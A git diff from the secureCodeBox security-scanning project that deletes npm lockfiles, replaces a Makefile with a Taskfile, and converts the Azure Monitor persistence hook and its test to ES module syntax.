- "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/package-lock.json.license b/hooks/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/package.json b/hooks/package.json deleted file mode 100644 index 8fcb86cfc9..0000000000 --- a/hooks/package.json +++ /dev/null @@ -1,50 +0,0 @@ -{ - "name": "@securecodebox/hooks", - "version": "1.0.0", - "description": "NPM library to easily set up new hooks for the secureCodeBox", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "index.js", - "directories": { - "example": "example" - }, - "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hooks" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "ts-jest": "^29.2.5" - }, - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - } -} diff --git a/hooks/package.json.license b/hooks/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-azure-monitor/Makefile b/hooks/persistence-azure-monitor/Makefile deleted file mode 100644 index e825bc975f..0000000000 --- a/hooks/persistence-azure-monitor/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-azure-monitor - -include ../../hooks.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-js diff --git a/hooks/persistence-azure-monitor/Taskfile.yaml b/hooks/persistence-azure-monitor/Taskfile.yaml new file mode 100644 index 0000000000..8e3bc1385f --- /dev/null +++ b/hooks/persistence-azure-monitor/Taskfile.yaml @@ -0,0 +1,12 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-azure-monitor diff --git a/hooks/persistence-azure-monitor/hook/Dockerfile b/hooks/persistence-azure-monitor/hook/Dockerfile index f1bd50720f..9bd4c97643 100644 --- a/hooks/persistence-azure-monitor/hook/Dockerfile +++ b/hooks/persistence-azure-monitor/hook/Dockerfile @@ -4,13 +4,7 @@ ARG baseImageTag ARG namespace -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --production FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./hook.js ./hook.js \ No newline at end of file diff --git a/hooks/persistence-azure-monitor/hook/hook.js b/hooks/persistence-azure-monitor/hook/hook.js index 5ef8cbe9b7..bc18139def 100644 --- a/hooks/persistence-azure-monitor/hook/hook.js +++ b/hooks/persistence-azure-monitor/hook/hook.js @@ -5,7 +5,7 @@ // Fixed settings for the script const monitorApiVersion = "2016-04-01"; -async function handle({ +export async function handle({ getFindings, scan, workspaceId = process.env["MONITOR_WORKSPACE_ID"], @@ -17,7 +17,7 @@ async function handle({ }) { if (!(workspaceId && sharedKey)) { console.error( - "Missing Workspace ID or shared key. Please provide them in the MONITOR_WORKSPACE_ID and MONITOR_SHARED_KEY environment variables" + "Missing Workspace ID or shared key. Please provide them in the MONITOR_WORKSPACE_ID and MONITOR_SHARED_KEY environment variables", ); process.exit(1); } @@ -39,7 +39,7 @@ async function handle({ scan_type: scan.spec.scanType, scan_parameters: scan.spec.parameters, scan_labels: scan.metadata.labels || {}, - })) + })), ); // Derive the LogType from the logTypePrefix and the scan type. @@ -101,9 +101,8 @@ async function handle({ } const { Error: errorCode, Message: errorMsg } = response.json(); console.error( - `An error occurred. Status Code: ${response.status}, status text: ${response.statusText}, Error: ${errorCode}, ErrorMsg: ${errorMsg}` + `An error occurred. Status Code: ${response.status}, status text: ${response.statusText}, Error: ${errorCode}, ErrorMsg: ${errorMsg}`, ); - } + }, ); } -module.exports.handle = handle; diff --git a/hooks/persistence-azure-monitor/hook/hook.test.js b/hooks/persistence-azure-monitor/hook/hook.test.js index 04e500ea58..a0648999d7 100644 --- a/hooks/persistence-azure-monitor/hook/hook.test.js +++ b/hooks/persistence-azure-monitor/hook/hook.test.js @@ -6,11 +6,11 @@ process.env["MONITOR_WORKSPACE_ID"] = "123123"; process.env["MONITOR_SHARED_KEY"] = "aGVsbG8taS1hbS1hLXRlc3Qta2V5"; process.env["MONITOR_LOGTYPE_PREFIX"] = "SCB"; -const { handle } = require("./hook"); +import { handle } from "./hook"; // Mock the fetch function const fetch = jest.fn( - (x) => new Promise((resolve, reject) => resolve({ status: 200 })) + (x) => new Promise((resolve, reject) => resolve({ status: 200 })), ); beforeEach(() => { diff --git a/hooks/persistence-azure-monitor/hook/package-lock.json b/hooks/persistence-azure-monitor/hook/package-lock.json deleted file mode 100644 index 00c76c545e..0000000000 --- a/hooks/persistence-azure-monitor/hook/package-lock.json +++ /dev/null @@ -1,6237 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.20.14", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.20.14.tgz", - "integrity": "sha512-0YpKHD6ImkWMEINCyDAD0HLLUH/lPCefG8ld9it8DJB2wnApraKuhgYTvTY1z7UFIfBTGy5LwncZ+5HWWGbhFw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.20.12", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.20.12.tgz", - "integrity": "sha512-XsMfHovsUYHFMdrIHkZphTN/2Hzzi78R08NuHfDBehym2VsPDL6Zn/JAD/JQdnRvbSsbQc4mVaU1m6JgtTEElg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.1.0", - "@babel/code-frame": "^7.18.6", - "@babel/generator": "^7.20.7", - "@babel/helper-compilation-targets": "^7.20.7", - "@babel/helper-module-transforms": "^7.20.11", - "@babel/helpers": "^7.20.7", - "@babel/parser": "^7.20.7", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.12", - "@babel/types": "^7.20.7", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/generator/node_modules/@jridgewell/gen-mapping": { - "version": "0.3.2", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.2.tgz", - "integrity": "sha512-mh65xKQAzI6iBcFzwv28KVWSmCkdRBWoOh+bYQGW3+6OZvbbN3TqMGo5hqYxQniRcH9F2VZIoJCm4pa3BPDK/A==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.20.7", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.20.7.tgz", - "integrity": "sha512-4tGORmfQcrc+bvrjb5y3dG9Mx1IOZjsHqQVUz7XCNHO+iTmqxWnVg3KRygjGmpRLJGdQSKuvFinbIb0CnZwHAQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.20.5", - "@babel/helper-validator-option": "^7.18.6", - "browserslist": "^4.21.3", - "lru-cache": "^5.1.1", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.18.6.tgz", - "integrity": "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA==", - "dev": true, - "dependencies": { - "@babel/types": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.20.11", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.20.11.tgz", - "integrity": 